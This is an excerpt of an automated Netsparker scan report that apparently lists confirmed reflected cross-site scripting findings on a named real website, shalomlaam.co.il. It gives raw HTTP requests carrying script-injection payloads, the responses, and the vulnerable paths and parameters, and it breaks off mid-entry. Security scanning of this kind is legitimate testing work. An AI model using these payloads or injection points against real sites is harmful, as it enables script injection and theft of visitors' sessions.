404;http://www.shalomlaam.co.il:80/page/odot/'"-->netsparker(0x0004E2)script>style>netsparker(0x000534) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:12 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/about/search/?'"-->netsparker(0x000534)script>style>

RequestGET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:03 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"-->netsparker(0x0001D5)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 175Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/contact/search/'"-->netsparker(0x0004A9)script>style>netsparker(0x000234)script>style>

3.72. /maillingUpdate.asp CONFIRMEDhttp://www.shalomlaam.co.il/maillingUpdate.asp?'"-->alert(0x000218)

ParametersParameter Type Value

Query Based Query String '"-->alert(0x000218)

RequestGET /maillingUpdate.asp?'"-->netsparker(0x000218) HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:36 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"-->netsparker(0x000218)script>style>

RequestGET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:15 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/home/'"-->netsparker(0x00010D)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:59:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 184Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"-->netsparker(0x00037E)script>style>netsparker(0x0001AF)script>style>

3.79. /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x000156)

RequestGET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/alon/list.asp'"-->netsparker(0x000156)script>style>

3.81. /about/reg/ CONFIRMEDhttp://www.shalomlaam.co.il/about/reg/?'"-->alert(0x0004FE)

ParametersParameter Type Value

Query Based Query String '"-->alert(0x0004FE)

RequestGET /about/reg/?'"-->netsparker(0x0004FE) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/about/reg/?'"-->netsparker(0x0004FE)script>style>

3.83. /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea